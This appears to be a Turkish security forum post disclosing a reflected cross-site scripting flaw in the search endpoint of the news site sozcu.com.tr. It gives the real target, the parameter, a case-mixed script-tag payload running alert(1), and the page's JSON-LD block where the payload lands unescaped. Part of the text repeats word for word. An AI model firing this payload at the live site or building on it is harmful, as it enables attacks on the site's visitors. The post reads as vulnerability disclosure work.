- Katılım
- 2 Ocak 2026
- Mesajlar
- 55
- Tepkime puanı
- 185
- Puan
- 33
Merhaba Bughane Üyeleri!
Bugün Sözcü Gazetesi'nde (sozcu.com.tr) tespit ettiğim ve başarıyla raporladığım Reflected XSS zafiyetini detaylı teknik analiziyle paylaşıyorum.
ZAFİYET DETAYLARI
Hedef: https://www.sozcu.com.tr
.
Parametre: search
.
Endpoint: /arama?search=
.
Tip: Reflected Cross-Site Scripting (XSS)
.
PAYLOAD: '</ScRiPt><sCripT class=atakan>alert(1)</sCripT>
Bugün Sözcü Gazetesi'nde (sozcu.com.tr) tespit ettiğim ve başarıyla raporladığım Reflected XSS zafiyetini detaylı teknik analiziyle paylaşıyorum.
ZAFİYET DETAYLARI
Hedef: https://www.sozcu.com.tr
.
Parametre: search
.
Endpoint: /arama?search=
.
Tip: Reflected Cross-Site Scripting (XSS)
.
PAYLOAD: '</ScRiPt><sCripT class=atakan>alert(1)</sCripT>
Çalışma Mantığı:
Sayfada bulunan JSON-LD script bloğuna payload raw olarak gömülüyor:
Kod:
<script type="application/ld+json">
{"@context":"https://schema.org",
"target":"https://www.sozcu.com.tr/arama?search='</script><script class=atakan>alert(1)</script>"}
</script>